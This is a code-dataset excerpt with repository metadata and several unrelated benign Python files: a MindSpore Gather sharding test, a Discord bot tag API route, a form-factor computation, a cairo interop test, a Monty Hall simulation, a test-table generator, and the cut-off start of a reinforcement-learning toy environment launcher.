repo_name
stringlengths 7
94
| repo_path
stringlengths 4
237
| repo_head_hexsha
stringlengths 40
40
| content
stringlengths 10
680k
| apis
stringlengths 2
840k
|
---|---|---|---|---|
PowerOlive/mindspore | tests/ut/python/parallel/test_manual_gatherv2.py | bda20724a94113cedd12c3ed9083141012da1f15 | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
import pytest
import mindspore as ms
from mindspore import context, Tensor, Parameter
from mindspore.common.api import _cell_graph_executor
from mindspore.nn import Cell, TrainOneStepCell, Momentum
from mindspore.ops import operations as P
from mindspore.common.initializer import initializer
class Net(Cell):
def __init__(self,
strategy1=None,
strategy2=None,
strategy3=None,
axis=0,
init_flag=True,
split_tuple=(4, 4),
split_string="manual_split",
param_shape=(8, 8)):
super().__init__()
self.gatherv2 = P.Gather().shard(strategy1)
self.gatherv2.add_prim_attr(split_string, split_tuple)
self.mul = P.Mul().shard(strategy2)
self.reshape = P.Reshape()
self.matmul = P.MatMul().shard(strategy3)
self.matmul.add_prim_attr("forward_reduce_scatter", True)
if init_flag:
self.param = Parameter(initializer("ones", param_shape, ms.float32), name="gatherv2_param")
else:
self.param = Parameter(Tensor(np.ones(param_shape), dtype=ms.float32), name="gatherv2_param")
self.mul_weight = Parameter(initializer("ones", (8, 8, 8), ms.float32), name="mul_weight")
self.matmul_weight = Parameter(initializer("ones", (64, 16), ms.float32), name="matmul_weight")
self.axis = axis
def construct(self, x, b):
out = self.gatherv2(self.param, x, self.axis)
out = self.mul(out, self.mul_weight)
out = self.reshape(out, (8, 64))
out = self.matmul(out, self.matmul_weight)
return out
_x = Tensor(np.ones([8, 8]), dtype=ms.int32)
_b = Tensor(np.ones([64, 8]), dtype=ms.float32)
def compile_net(net):
optimizer = Momentum(net.trainable_params(), learning_rate=0.1, momentum=0.9)
train_net = TrainOneStepCell(net, optimizer)
train_net.set_auto_parallel()
train_net.set_train()
_cell_graph_executor.compile(train_net, _x, _b, auto_parallel_mode=True)
context.reset_auto_parallel_context()
def test_normal_split():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
compile_net(net)
def test_normal_split2():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=4, global_rank=0)
strategy1 = ((4, 1), (1, 4))
strategy2 = ((1, 4, 1), (1, 4, 1))
strategy3 = ((1, 4), (4, 1))
net = Net(strategy1, strategy2, strategy3, split_tuple=(10, 20, 30, 4), param_shape=(64, 8))
compile_net(net)
def test_normal_split3():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=32, global_rank=17)
strategy1 = ((4, 8), (1, 4))
strategy2 = ((1, 4, 8), (1, 4, 8))
strategy3 = ((1, 32), (32, 1))
net = Net(strategy1, strategy2, strategy3, split_tuple=(10, 20, 30, 4), param_shape=(64, 8))
compile_net(net)
def test_normal_split_with_offset():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3, split_string="manual_split_with_offset", split_tuple=((4, 0), (4, 4)))
compile_net(net)
def test_auto_parallel_error():
context.set_auto_parallel_context(parallel_mode="auto_parallel", device_num=2, global_rank=0)
net = Net()
with pytest.raises(RuntimeError):
compile_net(net)
def test_axis_error():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3, axis=1)
with pytest.raises(RuntimeError):
compile_net(net)
def test_strategy_error():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=8, global_rank=0)
strategy1 = ((4, 1), (8, 1))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
with pytest.raises(RuntimeError):
compile_net(net)
def test_strategy_error2():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=8, global_rank=0)
strategy1 = ((4, 1), (1, 8))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
with pytest.raises(RuntimeError):
compile_net(net)
def test_strategy_error3():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=8, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
with pytest.raises(RuntimeError):
compile_net(net)
def test_strategy_error4():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 8), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
with pytest.raises(RuntimeError):
compile_net(net)
def test_strategy_error5():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=4, global_rank=0)
strategy1 = ((4, 1), (1, 4))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
with pytest.raises(RuntimeError):
compile_net(net)
def test_split_tuple_error():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3, split_tuple=((5, 0), (5, 5)))
with pytest.raises(RuntimeError):
compile_net(net)
def test_parameter_use_tensor_error():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3, init_flag=False)
with pytest.raises(RuntimeError):
compile_net(net)
| [((58, 12, 58, 27), 'numpy.ones', 'np.ones', ({(58, 20, 58, 26): '[8, 8]'}, {}), '([8, 8])', True, 'import numpy as np\n'), ((59, 12, 59, 28), 'numpy.ones', 'np.ones', ({(59, 20, 59, 27): '[64, 8]'}, {}), '([64, 8])', True, 'import numpy as np\n'), ((64, 16, 64, 48), 'mindspore.nn.TrainOneStepCell', 'TrainOneStepCell', ({(64, 33, 64, 36): 'net', (64, 38, 64, 47): 'optimizer'}, {}), '(net, optimizer)', False, 'from mindspore.nn import Cell, TrainOneStepCell, Momentum\n'), ((67, 4, 67, 76), 'mindspore.common.api._cell_graph_executor.compile', '_cell_graph_executor.compile', (), '', False, 'from mindspore.common.api import _cell_graph_executor\n'), ((68, 4, 68, 41), 'mindspore.context.reset_auto_parallel_context', 'context.reset_auto_parallel_context', ({}, {}), '()', False, 'from mindspore import context, Tensor, Parameter\n'), ((72, 4, 72, 102), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((81, 4, 81, 102), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((90, 4, 90, 104), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((99, 4, 99, 102), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((108, 4, 108, 97), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((115, 4, 115, 102), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((125, 4, 125, 102), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((135, 4, 135, 102), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((145, 4, 145, 102), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((155, 4, 155, 102), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((165, 4, 165, 102), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((175, 4, 175, 102), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((185, 4, 185, 102), 'mindspore.context.set_auto_parallel_context', 'context.set_auto_parallel_context', (), '', False, 'from mindspore import context, Tensor, Parameter\n'), ((39, 23, 39, 34), 'mindspore.ops.operations.Reshape', 'P.Reshape', ({}, {}), '()', True, 'from mindspore.ops import operations as P\n'), ((110, 9, 110, 36), 'pytest.raises', 'pytest.raises', ({(110, 23, 110, 35): 'RuntimeError'}, {}), '(RuntimeError)', False, 'import pytest\n'), ((120, 9, 120, 36), 'pytest.raises', 'pytest.raises', ({(120, 23, 120, 35): 'RuntimeError'}, {}), '(RuntimeError)', False, 'import pytest\n'), ((130, 9, 130, 36), 'pytest.raises', 'pytest.raises', ({(130, 23, 130, 35): 'RuntimeError'}, {}), '(RuntimeError)', False, 'import pytest\n'), ((140, 9, 140, 36), 'pytest.raises', 'pytest.raises', ({(140, 23, 140, 35): 'RuntimeError'}, {}), '(RuntimeError)', False, 'import pytest\n'), ((150, 9, 150, 36), 'pytest.raises', 'pytest.raises', ({(150, 23, 150, 35): 'RuntimeError'}, {}), '(RuntimeError)', False, 'import pytest\n'), ((160, 9, 160, 36), 'pytest.raises', 'pytest.raises', ({(160, 23, 160, 35): 'RuntimeError'}, {}), '(RuntimeError)', False, 'import pytest\n'), ((170, 9, 170, 36), 'pytest.raises', 'pytest.raises', ({(170, 23, 170, 35): 'RuntimeError'}, {}), '(RuntimeError)', False, 'import pytest\n'), ((180, 9, 180, 36), 'pytest.raises', 'pytest.raises', ({(180, 23, 180, 35): 'RuntimeError'}, {}), '(RuntimeError)', False, 'import pytest\n'), ((190, 9, 190, 36), 'pytest.raises', 'pytest.raises', ({(190, 23, 190, 35): 'RuntimeError'}, {}), '(RuntimeError)', False, 'import pytest\n'), ((46, 36, 46, 78), 'mindspore.common.initializer.initializer', 'initializer', ({(46, 48, 46, 54): '"""ones"""', (46, 56, 46, 65): '(8, 8, 8)', (46, 67, 46, 77): 'ms.float32'}, {}), "('ones', (8, 8, 8), ms.float32)", False, 'from mindspore.common.initializer import initializer\n'), ((47, 39, 47, 80), 'mindspore.common.initializer.initializer', 'initializer', ({(47, 51, 47, 57): '"""ones"""', (47, 59, 47, 67): '(64, 16)', (47, 69, 47, 79): 'ms.float32'}, {}), "('ones', (64, 16), ms.float32)", False, 'from mindspore.common.initializer import initializer\n'), ((36, 24, 36, 34), 'mindspore.ops.operations.Gather', 'P.Gather', ({}, {}), '()', True, 'from mindspore.ops import operations as P\n'), ((38, 19, 38, 26), 'mindspore.ops.operations.Mul', 'P.Mul', ({}, {}), '()', True, 'from mindspore.ops import operations as P\n'), ((40, 22, 40, 32), 'mindspore.ops.operations.MatMul', 'P.MatMul', ({}, {}), '()', True, 'from mindspore.ops import operations as P\n'), ((43, 35, 43, 79), 'mindspore.common.initializer.initializer', 'initializer', ({(43, 47, 43, 53): '"""ones"""', (43, 55, 43, 66): 'param_shape', (43, 68, 43, 78): 'ms.float32'}, {}), "('ones', param_shape, ms.float32)", False, 'from mindspore.common.initializer import initializer\n'), ((45, 42, 45, 62), 'numpy.ones', 'np.ones', ({(45, 50, 45, 61): 'param_shape'}, {}), '(param_shape)', True, 'import numpy as np\n')] |
makayla-moster/ClemBot | ClemBot.Bot/bot/api/tag_route.py | 26503d25f1fbe2abcf99dbf0f68b17e88ad11a7c | from bot.api.api_client import ApiClient
from bot.api.base_route import BaseRoute
import typing as t
from bot.models import Tag
class TagRoute(BaseRoute):
def __init__(self, api_client: ApiClient):
super().__init__(api_client)
async def create_tag(self, name: str, content: str, guild_id: int, user_id: int, **kwargs) -> t.Optional[Tag]:
json = {
'Name': name,
'Content': content,
'GuildId': guild_id,
'UserId': user_id,
}
tag_dict = await self._client.post('tags', data=json, **kwargs)
if not tag_dict:
return None
return Tag.from_dict(tag_dict)
async def edit_tag_content(self, guild_id: int, name: str, content: str, **kwargs) -> t.Optional[Tag]:
json = {
'GuildId': guild_id,
'Name': name,
'Content': content
}
tag_dict = await self._client.patch('bot/tags', data=json, **kwargs)
if not tag_dict:
return None
return Tag.from_dict(tag_dict)
async def edit_tag_owner(self, guild_id: int, name: str, user_id: int, **kwargs) -> t.Optional[Tag]:
json = {
'GuildId': guild_id,
'Name': name,
'UserId': user_id
}
tag_dict = await self._client.patch('bot/tags', data=json, **kwargs)
if not tag_dict:
return None
return Tag.from_dict(tag_dict)
async def get_tag(self, guild_id: int, name: str) -> t.Optional[Tag]:
json = {
'GuildId': guild_id,
'Name': name,
}
tag_dict = await self._client.get('bot/tags', data=json)
if not tag_dict:
return None
return Tag.from_dict(tag_dict)
async def get_tag_content(self, guild_id: int, name: str) -> t.Optional[str]:
json = {
'GuildId': guild_id,
'Name': name,
}
resp = await self._client.get('bot/tags', data=json)
return None if resp is None else resp['content']
async def delete_tag(self, guild_id: int, name: str, **kwargs):
"""
Makes a call to the API to delete a tag w/ the given GuildId and Name.
If successful, the API will return a dict with the given values:
- name The name of the tag.
- content The content of the tag.
- guildId The guild id the tag was in.
"""
json = {
'GuildId': guild_id,
'Name': name,
}
return await self._client.delete('bot/tags', data=json, **kwargs)
async def add_tag_use(self, guild_id: int, name: str, channel_id: int, user_id: int):
"""
Makes a call to the API to say a tag w/ the given Name was used.
If successful, the API will return a dict with the given values:
- name The name of the tag.
- guildId The guild id the tag is in.
"""
json = {
'GuildId': guild_id,
'Name': name,
'ChannelId': channel_id,
'UserId': user_id
}
return await self._client.post('bot/tags/invoke', data=json)
async def get_guilds_tags(self, guild_id: int) -> t.Iterator[Tag]:
resp = await self._client.get(f'guilds/{guild_id}/tags')
if not resp:
return []
return [Tag.from_dict(i) for i in resp['tags']]
| [((23, 15, 23, 38), 'bot.models.Tag.from_dict', 'Tag.from_dict', ({(23, 29, 23, 37): 'tag_dict'}, {}), '(tag_dict)', False, 'from bot.models import Tag\n'), ((34, 15, 34, 38), 'bot.models.Tag.from_dict', 'Tag.from_dict', ({(34, 29, 34, 37): 'tag_dict'}, {}), '(tag_dict)', False, 'from bot.models import Tag\n'), ((45, 15, 45, 38), 'bot.models.Tag.from_dict', 'Tag.from_dict', ({(45, 29, 45, 37): 'tag_dict'}, {}), '(tag_dict)', False, 'from bot.models import Tag\n'), ((55, 15, 55, 38), 'bot.models.Tag.from_dict', 'Tag.from_dict', ({(55, 29, 55, 37): 'tag_dict'}, {}), '(tag_dict)', False, 'from bot.models import Tag\n'), ((101, 16, 101, 32), 'bot.models.Tag.from_dict', 'Tag.from_dict', ({(101, 30, 101, 31): 'i'}, {}), '(i)', False, 'from bot.models import Tag\n')] |
kirichoi/PolymerConnectome | formfactor_AL.py | 064df932cfca57a97e62dfa9a32d1fa976500906 | # -*- coding: utf-8 -*-
"""
Created on Mon Sep 7 10:59:00 2020
@author: user
"""
import numpy as np
import multiprocessing as mp
import matplotlib.pyplot as plt
import time
import itertools
import ctypes
def formfactor(args):
# with AL_dist_flat_glo.get_lock:
AL_dist_flat_glo_r = np.frombuffer(AL_dist_flat_glo.get_obj())
AL_dist_flat_glo_s = AL_dist_flat_glo_r.reshape((n_glo.value,m_glo.value))
# ffq = np.sum(np.cos(np.dot(np.logspace(-2,3,100)[args[0]]*np.array([1,0,0]),
# np.subtract(AL_dist_flat_glo_s[args[1]], AL_dist_flat_glo_s[1+args[1]:]).T)))
qr = np.logspace(-2,3,100)[args[0]]
rvec = np.subtract(AL_dist_flat_glo_s[args[1]], AL_dist_flat_glo_s[1+args[1]:]).T
cosx = np.cos(np.dot(qr*np.array([1,0,0]), rvec))
cosy = np.cos(np.dot(qr*np.array([0,1,0]), rvec))
cosz = np.cos(np.dot(qr*np.array([0,0,1]), rvec))
# cosxy = np.cos(np.dot(qr*np.array([0.707,0.707,0]), rvec))
# cosyz = np.cos(np.dot(qr*np.array([0,0.707,0.707]), rvec))
# cosxz = np.cos(np.dot(qr*np.array([0.707,0,0.707]), rvec))
# cosxyz = np.cos(np.dot(qr*np.array([0.577,0.577,0.577]), rvec))
ffq = np.sum(np.mean(np.array([cosx, cosy, cosz]), axis=0))
return ffq
def parallelinit(AL_dist_flat_glo_, n_glo_, m_glo_):
global AL_dist_flat_glo, n_glo, m_glo
AL_dist_flat_glo = AL_dist_flat_glo_
n_glo = n_glo_
m_glo = m_glo_
if __name__ == '__main__':
AL_dist_flat = np.load(r'./AL_dist_flat.npy')
n = np.shape(AL_dist_flat)[0]
m = np.shape(AL_dist_flat)[1]
q_range = np.logspace(-2,3,100)
# r_x = np.array([1, 0, 0])
# q_range_glo = mp.Array(ctypes.c_double, q_range)
AL_dist_flat_glo = mp.Array(ctypes.c_double, AL_dist_flat.flatten())
n_glo = mp.Value(ctypes.c_int, n)
m_glo = mp.Value(ctypes.c_int, m)
# r_x_glo = mp.Array(ctypes.c_double, r_x)
paramlist = list(itertools.product(range(100), range(n)))
pool = mp.Pool(20, initializer=parallelinit, initargs=(AL_dist_flat_glo, n_glo, m_glo))
t1 = time.time()
results = pool.map(formfactor, paramlist)
pool.close()
t2 = time.time()
print(t2-t1)
np.save(r'./AL_results.npy', results)
Pq = 2*np.divide(np.sum(np.array(results).reshape(100, n), axis=1), n)
# fig = plt.figure(figsize=(8,6))
# plt.plot(q_range, Pq, lw=3, color='tab:orange')
# plt.xscale('log')
# plt.xlabel('$q$', fontsize=15)
# plt.ylabel('$P(q)$', fontsize=15)
# plt.tight_layout()
# plt.savefig(r'./AL_form_factor.pdf', dpi=300, bbox_inches='tight')
# plt.show()
fig = plt.figure(figsize=(8,6))
plt.plot(q_range, Pq, lw=3, color='tab:orange')
plt.xscale('log')
plt.yscale('log')
plt.xlabel('$q$', fontsize=15)
plt.ylabel('$P(q)$', fontsize=15)
plt.tight_layout()
plt.savefig(r'./AL_form_factor_log.pdf', dpi=300, bbox_inches='tight')
plt.show()
| [((40, 19, 40, 49), 'numpy.load', 'np.load', ({(40, 27, 40, 48): '"""./AL_dist_flat.npy"""'}, {}), "('./AL_dist_flat.npy')", True, 'import numpy as np\n'), ((44, 14, 44, 35), 'numpy.logspace', 'np.logspace', ({(44, 26, 44, 28): '-2', (44, 29, 44, 30): '3', (44, 31, 44, 34): '100'}, {}), '(-2, 3, 100)', True, 'import numpy as np\n'), ((49, 12, 49, 37), 'multiprocessing.Value', 'mp.Value', ({(49, 21, 49, 33): 'ctypes.c_int', (49, 35, 49, 36): 'n'}, {}), '(ctypes.c_int, n)', True, 'import multiprocessing as mp\n'), ((50, 12, 50, 37), 'multiprocessing.Value', 'mp.Value', ({(50, 21, 50, 33): 'ctypes.c_int', (50, 35, 50, 36): 'm'}, {}), '(ctypes.c_int, m)', True, 'import multiprocessing as mp\n'), ((55, 11, 55, 91), 'multiprocessing.Pool', 'mp.Pool', (), '', True, 'import multiprocessing as mp\n'), ((57, 9, 57, 20), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((62, 9, 62, 20), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((66, 4, 66, 41), 'numpy.save', 'np.save', ({(66, 12, 66, 31): '"""./AL_results.npy"""', (66, 33, 66, 40): 'results'}, {}), "('./AL_results.npy', results)", True, 'import numpy as np\n'), ((79, 10, 79, 35), 'matplotlib.pyplot.figure', 'plt.figure', (), '', True, 'import matplotlib.pyplot as plt\n'), ((80, 4, 80, 51), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((81, 4, 81, 21), 'matplotlib.pyplot.xscale', 'plt.xscale', ({(81, 15, 81, 20): '"""log"""'}, {}), "('log')", True, 'import matplotlib.pyplot as plt\n'), ((82, 4, 82, 21), 'matplotlib.pyplot.yscale', 'plt.yscale', ({(82, 15, 82, 20): '"""log"""'}, {}), "('log')", True, 'import matplotlib.pyplot as plt\n'), ((83, 4, 83, 34), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (), '', True, 'import matplotlib.pyplot as plt\n'), ((84, 4, 84, 37), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (), '', True, 'import matplotlib.pyplot as plt\n'), ((85, 4, 85, 22), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((86, 4, 86, 74), 'matplotlib.pyplot.savefig', 'plt.savefig', (), '', True, 'import matplotlib.pyplot as plt\n'), ((87, 4, 87, 14), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((21, 9, 21, 30), 'numpy.logspace', 'np.logspace', ({(21, 21, 21, 23): '(-2)', (21, 24, 21, 25): '(3)', (21, 26, 21, 29): '(100)'}, {}), '(-2, 3, 100)', True, 'import numpy as np\n'), ((22, 11, 22, 83), 'numpy.subtract', 'np.subtract', ({(22, 23, 22, 50): 'AL_dist_flat_glo_s[args[1]]', (22, 52, 22, 82): 'AL_dist_flat_glo_s[1 + args[1]:]'}, {}), '(AL_dist_flat_glo_s[args[1]], AL_dist_flat_glo_s[1 + args[1]:])', True, 'import numpy as np\n'), ((42, 8, 42, 30), 'numpy.shape', 'np.shape', ({(42, 17, 42, 29): 'AL_dist_flat'}, {}), '(AL_dist_flat)', True, 'import numpy as np\n'), ((43, 8, 43, 30), 'numpy.shape', 'np.shape', ({(43, 17, 43, 29): 'AL_dist_flat'}, {}), '(AL_dist_flat)', True, 'import numpy as np\n'), ((30, 25, 30, 53), 'numpy.array', 'np.array', ({(30, 34, 30, 52): '[cosx, cosy, cosz]'}, {}), '([cosx, cosy, cosz])', True, 'import numpy as np\n'), ((23, 28, 23, 45), 'numpy.array', 'np.array', ({(23, 37, 23, 44): '[1, 0, 0]'}, {}), '([1, 0, 0])', True, 'import numpy as np\n'), ((24, 28, 24, 45), 'numpy.array', 'np.array', ({(24, 37, 24, 44): '[0, 1, 0]'}, {}), '([0, 1, 0])', True, 'import numpy as np\n'), ((25, 28, 25, 45), 'numpy.array', 'np.array', ({(25, 37, 25, 44): '[0, 0, 1]'}, {}), '([0, 0, 1])', True, 'import numpy as np\n'), ((68, 28, 68, 45), 'numpy.array', 'np.array', ({(68, 37, 68, 44): 'results'}, {}), '(results)', True, 'import numpy as np\n')] |
nanodude/cairocffi | utils/tests.py | 9d6a9a420a91da80f7901ace9945fd864f5d04dc | # coding: utf-8
import io
import cairo # pycairo
import cairocffi
from pycairo_to_cairocffi import _UNSAFE_pycairo_context_to_cairocffi
from cairocffi_to_pycairo import _UNSAFE_cairocffi_context_to_pycairo
import pango_example
def test():
cairocffi_context = cairocffi.Context(cairocffi.PDFSurface(None, 10, 20))
cairocffi_context.scale(2, 3)
pycairo_context = _UNSAFE_cairocffi_context_to_pycairo(cairocffi_context)
cairocffi_context2 = _UNSAFE_pycairo_context_to_cairocffi(pycairo_context)
assert tuple(cairocffi_context.get_matrix()) == (2, 0, 0, 3, 0, 0)
assert tuple(cairocffi_context2.get_matrix()) == (2, 0, 0, 3, 0, 0)
assert tuple(pycairo_context.get_matrix()) == (2, 0, 0, 3, 0, 0)
assert cairocffi_context2._pointer == cairocffi_context._pointer
file_obj = io.BytesIO()
# Mostly test that this runs without raising.
pango_example.write_example_pdf(file_obj)
assert file_obj.getvalue().startswith(b'%PDF')
if __name__ == '__main__':
test()
| [((15, 22, 15, 77), 'cairocffi_to_pycairo._UNSAFE_cairocffi_context_to_pycairo', '_UNSAFE_cairocffi_context_to_pycairo', ({(15, 59, 15, 76): 'cairocffi_context'}, {}), '(cairocffi_context)', False, 'from cairocffi_to_pycairo import _UNSAFE_cairocffi_context_to_pycairo\n'), ((16, 25, 16, 78), 'pycairo_to_cairocffi._UNSAFE_pycairo_context_to_cairocffi', '_UNSAFE_pycairo_context_to_cairocffi', ({(16, 62, 16, 77): 'pycairo_context'}, {}), '(pycairo_context)', False, 'from pycairo_to_cairocffi import _UNSAFE_pycairo_context_to_cairocffi\n'), ((22, 15, 22, 27), 'io.BytesIO', 'io.BytesIO', ({}, {}), '()', False, 'import io\n'), ((24, 4, 24, 45), 'pango_example.write_example_pdf', 'pango_example.write_example_pdf', ({(24, 36, 24, 44): 'file_obj'}, {}), '(file_obj)', False, 'import pango_example\n'), ((13, 42, 13, 76), 'cairocffi.PDFSurface', 'cairocffi.PDFSurface', ({(13, 63, 13, 67): 'None', (13, 69, 13, 71): '10', (13, 73, 13, 75): '20'}, {}), '(None, 10, 20)', False, 'import cairocffi\n')] |
robertlit/monty-hall-problem | riddle.py | 746cab513dacdc1f47ce7269db35167df3520865 | import random
goat1 = random.randint(1, 3)
goat2 = random.randint(1, 3)
while goat1 == goat2:
goat2 = random.randint(1, 3)
success = 0
tries = 1_000_000
for _ in range(tries):
options = [1, 2, 3]
choice = random.randint(1, 3)
options.remove(choice)
if choice == goat1:
options.remove(goat2)
else:
options.remove(goat1)
choice = options[0]
if choice != goat1 and choice != goat2:
success = success + 1
print(success / tries)
| [((3, 8, 3, 28), 'random.randint', 'random.randint', ({(3, 23, 3, 24): '1', (3, 26, 3, 27): '3'}, {}), '(1, 3)', False, 'import random\n'), ((4, 8, 4, 28), 'random.randint', 'random.randint', ({(4, 23, 4, 24): '1', (4, 26, 4, 27): '3'}, {}), '(1, 3)', False, 'import random\n'), ((7, 12, 7, 32), 'random.randint', 'random.randint', ({(7, 27, 7, 28): '1', (7, 30, 7, 31): '3'}, {}), '(1, 3)', False, 'import random\n'), ((14, 13, 14, 33), 'random.randint', 'random.randint', ({(14, 28, 14, 29): '1', (14, 31, 14, 32): '3'}, {}), '(1, 3)', False, 'import random\n')] |
selavy/studies | gentable/gen_test_cases.py | e17b91ffab193e46fec00cf2b8070dbf1f2c39e3 | #!/usr/bin/env python3
import random
N = 32
M = 64
# NOTE: 0 is a reserved value
randu = lambda x: random.randint(1, 2**x-1)
randU32 = lambda: randu(32)
randU64 = lambda: randu(64)
fmt_by_dtype = {
'u32hex': '0x{:08x}',
'u64hex': '0x{:016x}',
}
cpp_by_dtype = {
'u32hex': 'uint32_t',
'u64hex': 'uint64_t',
}
# key = randU32()
# vals = [(key, randU32(), randU64()) for _ in range(N)]
# keys = [(x[0], x[1]) for x in vals]
# success = [random.choice(vals) for _ in range(M)]
# failure = []
keys = [(randU32(),) for _ in range(M)]
vals = [(randU32(), randU64()) for _ in range(N)]
def genval():
y = randU32()
while y in vals:
y = randU32()
return y
miss = [(genval(),) for _ in range(M)]
def print_vector(vals, name, dtypes, indent=0):
indent = ' ' * indent
tabs = indent + ' '
cpptypes = [cpp_by_dtype[dt] for dt in dtypes]
if len(cpptypes) == 1:
cctype = cpptypes[0]
def fmtrow(vs): return vs
else:
cctype = f"std::tuple<{', '.join(cpptypes)}>"
def fmtrow(vs): return f"{{ {vs} }}"
fmts = [fmt_by_dtype[dt] for dt in dtypes]
print(f"{indent}const std::vector<{cctype}> {name} = {{")
rows = [
tabs + fmtrow(', '.join([fmt.format(v) for v, fmt in zip(vs, fmts)])) + ','
for vs in vals
]
print("\n".join(rows))
print(f"{indent}}};")
print('TEST_CASE("Insert random values and look them up", "[gentbl]")')
print('{')
print_vector(keys, name='keys', dtypes=['u32hex'], indent=4)
print()
print_vector(vals, name='vals', dtypes=['u32hex', 'u64hex'], indent=4)
print()
print_vector(miss, name='miss', dtypes=['u32hex'], indent=4)
print()
print('}')
# print("const std::vector<std::tuple<uint32_t, uint32_t, uint64_t>> vs = {")
# for _ in range(N):
# print(" {{ 0x{:08x}, 0x{:08x}, 0x{:016x} }},".format(
# randU32(), randU32(), randU64()))
# print("};")
| [((10, 20, 10, 45), 'random.randint', 'random.randint', ({(10, 35, 10, 36): '(1)', (10, 38, 10, 44): '(2 ** x - 1)'}, {}), '(1, 2 ** x - 1)', False, 'import random\n')] |
aaspeel/deer | examples/toy_env/run_toy_env.py | 3ced3695f0ca8537337019d2e3ec0ff8bd346d91 | """Toy environment launcher. See the docs for more details about this environment.
"""
import sys
import logging
import numpy as np
from deer.default_parser import process_args
from deer.agent import NeuralAgent
from deer.learning_algos.q_net_keras import MyQNetwork
from Toy_env import MyEnv as Toy_env
import deer.experiment.base_controllers as bc
from deer.policies import EpsilonGreedyPolicy
class Defaults:
# ----------------------
# Experiment Parameters
# ----------------------
STEPS_PER_EPOCH = 1000
EPOCHS = 50
STEPS_PER_TEST = 500
PERIOD_BTW_SUMMARY_PERFS = 1
# ----------------------
# Environment Parameters
# ----------------------
FRAME_SKIP = 1
# ----------------------
# DQN Agent parameters:
# ----------------------
